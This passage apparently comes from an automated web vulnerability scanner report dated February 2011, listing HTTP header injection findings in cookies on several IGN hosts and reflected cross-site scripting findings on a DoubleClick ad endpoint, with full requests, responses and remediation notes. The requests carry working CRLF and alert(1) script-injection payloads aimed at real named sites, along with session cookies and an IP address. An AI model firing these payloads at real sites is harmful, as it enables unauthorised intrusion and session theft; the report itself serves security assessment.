Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0586ea%0d%0aa1bd0260909; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:47:12 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297043232115v-2n-12mc+1297043232115mv+2mn+12wwe~0586ea
a1bd0260909
;Path=/;Domain=.ign.com
Content-Length: 123885

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...

2.15. http://cheats.ign.com/sendcheats.html [freq cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /sendcheats.html

Issue detail

The value of the freq cookie is copied into the Set-Cookie response header. The payload ae05e%0d%0aa1cab0fd9dc was submitted in the freq cookie. This caused a response containing an injected HTTP header.

Request

GET /sendcheats.html HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0ae05e%0d%0aa1cab0fd9dc; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:46:21 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297043181121v-2n-12mc+1297043181121mv+2mn+12wwe~0ae05e
a1cab0fd9dc
;Path=/;Domain=.ign.com
Content-Length: 82866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>Send Cheats</title
...[SNIP]...

2.16. http://corp.ign.com/properties/ign.html [freq cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://corp.ign.com
Path:   /properties/ign.html

Issue detail

The value of the freq cookie is copied into the Set-Cookie response header. The payload 17e60%0d%0abcf78f5927f was submitted in the freq cookie. This caused a response containing an injected HTTP header.

Request

GET /properties/ign.html HTTP/1.1
Host: corp.ign.com
Proxy-Connection: keep-alive
Referer: http://corp.ign.com/?64dab%22-alert(document.cookie)-%228250c170f0f=1
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297041142.2; __utmc=173446715; s_pers=%20s_nr%3D1297041153777%7C1299633153777%3B%20s_lv%3D1297041153779%7C1391649153779%3B%20s_lv_s%3DFirst%2520Visit%7C1297042953779%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dmy.ign.com%253Axbox360.ign.com%3B%20s_c13%3Dmy.ign.com%253Axbox360.ign.com%3B%20s_sq%3D%3B; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=10089; decc=US; NGUserID=a016c08-31833-869633041-5; i18n-cc=US; freq=c-1297041296732v-1n-12mc+1297041296732mv+0mn+0wwe~017e60%0d%0abcf78f5927f; __utma=1.1277650538.1297041360.1297041360.1297041360.1; __utmb=1; __utmc=1; __utmz=1.1297041360.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; __utmb=173446715; _br_uid_1=uid%3D3168630853761%3A

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:59:14 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297041296732v-2n-12mc+1297041296732mv+0mn+0wwe~017e60
bcf78f5927f
;Path=/;Domain=.ign.com
Content-Length: 10442

<!DOCTYPE html>
<html lang="en"><head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <title>IGN.com - IGN Entertainment</title>
   <link rel="stylesheet" href="http://corpm
...[SNIP]...

2.17. http://ubt.ign.com/record [Raisin2 cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ubt.ign.com
Path:   /record

Issue detail

The value of the Raisin2 cookie is copied into the Set-Cookie response header. The payload 68ea8%0d%0a8fb633e8e00 was submitted in the Raisin2 cookie. This caused a response containing an injected HTTP header.

Request

GET /record?site=xbox360&dechannel=ignxbox360&random=1297041089824&property=ign&ct=gif&network=fim&channel_id=542&size=1x1&hosted_id=7527&rsi_segs=10089&PageId=1297041089824&name=ATAtracker&subdomain=xbox360.ign.com&pagetype=channel&pagetype=channel&server=linapp10.in.snowball.com&src=wrapper&reginsider=a& HTTP/1.1
Host: ubt.ign.com
Proxy-Connection: keep-alive
Referer: http://xbox360.ign.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; NGUserID=a016c06-15003-1306593845-5; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmb=173446715.3.10.1297040497; Raisin2=1|68ea8%0d%0a8fb633e8e00; rsi_segs=10089; decc=US; i18n-cc=US; freq=c-1297041089878v-1n-12mc+1297041089878mv+1mn+12wwe~0; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; s_pers=%20s_nr%3D1297041129783%7C1299633129783%3B%20s_lv%3D1297041129785%7C1391649129785%3B%20s_lv_s%3DFirst%2520Visit%7C1297042929785%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dxbox360.ign.com%253A%3B%20s_c13%3Dxbox360.ign.com%253A%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:20:45 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: Raisin2=1|68ea8
8fb633e8e00
;Path=/;Domain=ubt.ign.com;Expires=Wed, 09-Apr-14 11:07:24 GMT
Set-Cookie: Raisin=;Path=/;Domain=.ign.com;Expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: Raisin=;Path=/;Domain=ubt.ign.com;Expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: Raisin2=;Path=/;Domain=.ign.com;Expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: Frogger=;Path=/;Domain=.ign.com;Expires=Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

2.18. http://wrapper.ign.com/a [freq cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wrapper.ign.com
Path:   /a

Issue detail

The value of the freq cookie is copied into the Set-Cookie response header. The payload 6755b%0d%0a26dcac47297 was submitted in the freq cookie. This caused a response containing an injected HTTP header.

Request

GET /a?size=text&pagetype=social_signin&subdomain=my.ign.com HTTP/1.1
Host: wrapper.ign.com
Proxy-Connection: keep-alive
Referer: http://my.ign.com/login?r=http://xbox360.ign.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; NGUserID=a016c06-15003-1306593845-5; decc=US; i18n-cc=US; freq=c-1297041089878v-1n-12mc+1297041089878mv+1mn+12wwe~06755b%0d%0a26dcac47297; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; __utma=173446715.1624600188.1297040497.1297040497.1297041142.2; __utmb=173446715; __utmc=173446715; rsi_segs=10089; s_pers=%20s_nr%3D1297041150626%7C1299633150626%3B%20s_lv%3D1297041150648%7C1391649150648%3B%20s_lv_s%3DFirst%2520Visit%7C1297042950648%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dxbox360.ign.com%253A%3B%20s_c13%3Dxbox360.ign.com%253A%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Axbox360%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/login%2525253Fr%2525253Dhttp%2525253A//xbox360.ign.com/%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:14:55 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: freq=c-1297041089878v-1n-12mc+1297041089878mv+1mn+12wwe~06755b
26dcac47297
;Path=/;Domain=.ign.com
Content-Type: text/html;charset=UTF-8
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="NOI ADMa OUR STP"
Content-Length: 73275

if(typeof showStitial == 'undefined' || !showStitial){
if(typeof adString == 'undefined') var adString = "";

var tileDate = new Date();
var tile = tileDate.getTime();
var isLinked
...[SNIP]...

3. Cross-site scripting (reflected)  previous
There are 803 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://ad.doubleclick.net/adj/N4881.mmath/B5196269.16 [mt_adid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4881.mmath/B5196269.16

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ecb9a'-alert(1)-'9f8b5bd9678 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4881.mmath/B5196269.16;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=115062657883708758&mt_id=108209&mt_adid=100293ecb9a'-alert(1)-'9f8b5bd9678&redirect=;ord=115062657883708758? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/300x250/thechive_us?t=1297045626926&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:27:19 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5832

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Jan 20 17:08:58 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
3Bh%3Dv8/3aa7/f/7e/%2a/l%3B235303334%3B0-0%3B0%3B59104090%3B4307-300/250%3B40362855/40380642/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=115062657883708758&mt_id=108209&mt_adid=100293ecb9a'-alert(1)-'9f8b5bd9678&redirect=http%3a%2f%2fclk.redcated/GRK/go/296095966/direct/01/\">
...[SNIP]...

3.2. http://ad.doubleclick.net/adj/N4881.mmath/B5196269.16 [mt_adid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4881.mmath/B5196269.16

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ea05f"-alert(1)-"d7405e6c27 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4881.mmath/B5196269.16;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=115062657883708758&mt_id=108209&mt_adid=100293ea05f"-alert(1)-"d7405e6c27&redirect=;ord=115062657883708758? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/300x250/thechive_us?t=1297045626926&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:27:15 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5828

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Jan 20 17:08:58 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
3Bh%3Dv8/3aa7/f/7d/%2a/l%3B235303334%3B0-0%3B0%3B59104090%3B4307-300/250%3B40362855/40380642/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=115062657883708758&mt_id=108209&mt_adid=100293ea05f"-alert(1)-"d7405e6c27&redirect=http%3a%2f%2fclk.redcated/GRK/go/296095966/direct/01/");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var
...[SNIP]...

3.3. http://ad.doubleclick.net/adj/N4881.mmath/B5196269.16 [mt_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4881.mmath/B5196269.16

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b345"-alert(1)-"d5c45be131d was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4881.mmath/B5196269.16;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=115062657883708758&mt_id=1082092b345"-alert(1)-"d5c45be131d&mt_adid=100293&redirect=;ord=115062657883708758? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/300x250/thechive_us?t=1297045626926&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:27:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5832

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Jan 20 17:08:58 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
lick.net/click%3Bh%3Dv8/3aa7/f/7e/%2a/l%3B235303334%3B0-0%3B0%3B59104090%3B4307-300/250%3B40362855/40380642/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=115062657883708758&mt_id=1082092b345"-alert(1)-"d5c45be131d&mt_adid=100293&redirect=http%3a%2f%2fclk.atdmt.com/GRK/go/296095966/direct/01/");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "
...[SNIP]...

3.4. http://ad.doubleclick.net/adj/N4881.mmath/B5196269.16 [mt_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4881.mmath/B5196269.16

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64a23'-alert(1)-'2677801c6b9 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4881.mmath/B5196269.16;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=115062657883708758&mt_id=10820964a23'-alert(1)-'2677801c6b9&mt_adid=100293&redirect=;ord=115062657883708758? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/300x250/thechive_us?t=1297045626926&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:27:11 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5832

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Jan 20 17:08:58 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
lick.net/click%3Bh%3Dv8/3aa7/f/7e/%2a/l%3B235303334%3B0-0%3B0%3B59104090%3B4307-300/250%3B40362855/40380642/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=115062657883708758&mt_id=10820964a23'-alert(1)-'2677801c6b9&mt_adid=100293&redirect=http%3a%2f%2fclk.atdmt.com/GRK/go/296095966/direct/01/\">
...[SNIP]...

3.5. http://ad.doubleclick.net/adj/N4881.mmath/B5196269.16 [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4881.mmath/B5196269.16

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a56a1'-alert(1)-'9136e52bb72 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4881.mmath/B5196269.16;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=115062657883708758&mt_id=108209&mt_adid=100293&redirect=a56a1'-alert(1)-'9136e52bb72 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/300x250/thechive_us?t=1297045626926&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
